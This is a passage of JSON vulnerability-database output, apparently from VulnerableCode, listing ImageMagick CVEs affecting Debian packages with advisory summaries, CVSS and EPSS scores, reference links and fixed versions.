"VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-23874", "GHSA-9vj4-wc7r-p844" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vaks-d4k5-zue7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24627?format=api", "vulnerability_id": "VCID-vpdn-g1k9-1kdn", "summary": "ImageMagick has heap buffer overflow in YUV 4:2:2 decoder\nA heap buffer overflow write vulnerability exists in ReadYUVImage() (coders/yuv.c) when processing malicious YUV 4:2:2 (NoInterlace) images. The pixel-pair loop writes one pixel beyond the allocated row buffer.\n\n```\n=================================================================\n==204642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5170000002e0 at pc 0x562d21a7e8de bp 0x7fffa9ae1270 sp 0x7fffa9ae1260\nWRITE of size 8 at 0x5170000002e0 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25986.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25986.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25986", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.0725", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07292", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07168", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07174", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07243", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07252", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07266", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07269", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07242", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07208", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07188", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00061", "scoring_system": "epss", "scoring_elements": "0.19294", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25986" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25986", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25986" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mqfc-82jx-3mr2", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:06:36Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mqfc-82jx-3mr2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25986", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25986" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442111", "reference_id": "2442111", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442111" }, { "reference_url": "https://github.com/advisories/GHSA-mqfc-82jx-3mr2", "reference_id": "GHSA-mqfc-82jx-3mr2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mqfc-82jx-3mr2" }, { "reference_url": "https://usn.ubuntu.com/8069-1/", "reference_id": "USN-8069-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8069-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25986", "GHSA-mqfc-82jx-3mr2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vpdn-g1k9-1kdn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351746?format=api", "vulnerability_id": "VCID-w9zg-tsbg-afa1", "summary": "ImageMagick: Magick.NET: ImageMagick: Denial of Service via out-of-bounds write in XML parsing", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33899.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33899.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33899", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04425", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04409", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00039", "scoring_system": "epss", "scoring_elements": "0.11639", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12406", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33899" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33899", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33899" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:22:04Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/ae679e2fd19ec656bfab9f822ae4cf06bf91604d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:22:04Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/ae679e2fd19ec656bfab9f822ae4cf06bf91604d" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:22:04Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458026", "reference_id": "2458026", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458026" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33899", "reference_id": "CVE-2026-33899", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33899" }, { "reference_url": "https://github.com/advisories/GHSA-cr67-pvmx-2pp2", "reference_id": "GHSA-cr67-pvmx-2pp2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cr67-pvmx-2pp2" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cr67-pvmx-2pp2", "reference_id": "GHSA-cr67-pvmx-2pp2", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-16T13:22:04Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cr67-pvmx-2pp2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-33899", "GHSA-cr67-pvmx-2pp2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w9zg-tsbg-afa1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23819?format=api", "vulnerability_id": "VCID-x8c1-btup-4ygu", "summary": "ImageMagick is vulnerable to an integer Overflow in TIM decoder leading to out of bounds read (32-bit only)\nThe TIM (PSX TIM) image parser in ImageMagick contains a critical integer overflow vulnerability in the `ReadTIMImage` function (`coders/tim.c`). The code reads `width` and `height` (16-bit values) from the file header and calculates `image_size = 2 * width * height` without checking for overflow.\nOn 32-bit systems (or where `size_t` is 32-bit), this calculation can overflow if `width` and `height` are large (e.g., 65535), wrapping around to a small value. This results in a small heap allocation via `AcquireQuantumMemory` and later operations relying on the dimensions can trigger an out of bounds read.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-66628.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-66628.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66628", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.14936", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.14795", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.14991", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.14914", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.14885", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.184", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18448", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18235", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18332", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18306", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18294", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18349", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66628" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66628", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66628" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/commit/2dfa08e15cfd11016a79615994787b14f9048b1c", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-11T15:38:44Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/commit/2dfa08e15cfd11016a79615994787b14f9048b1c" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1122584", "reference_id": "1122584", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1122584" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2421159", "reference_id": "2421159", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2421159" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66628", "reference_id": "CVE-2025-66628", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66628" }, { "reference_url": "https://github.com/advisories/GHSA-6hjr-v6g4-3fm8", "reference_id": "GHSA-6hjr-v6g4-3fm8", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6hjr-v6g4-3fm8" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6hjr-v6g4-3fm8", "reference_id": "GHSA-6hjr-v6g4-3fm8", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-11T15:38:44Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-6hjr-v6g4-3fm8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-66628", "GHSA-6hjr-v6g4-3fm8" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x8c1-btup-4ygu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24594?format=api", "vulnerability_id": "VCID-x8c6-9pse-xkc8", "summary": "ImageMagick: Integer overflow in DIB coder can result in out of bounds read or write\nAn integer overflow in DIB coder can result in out of bounds read or write", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28693.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28693.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28693", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18648", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18595", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18515", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18798", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.18744", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.19919", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20148", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20102", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20044", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20026", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.2003", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20029", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28693" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28693", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28693" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hffp-q43q-qq76", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 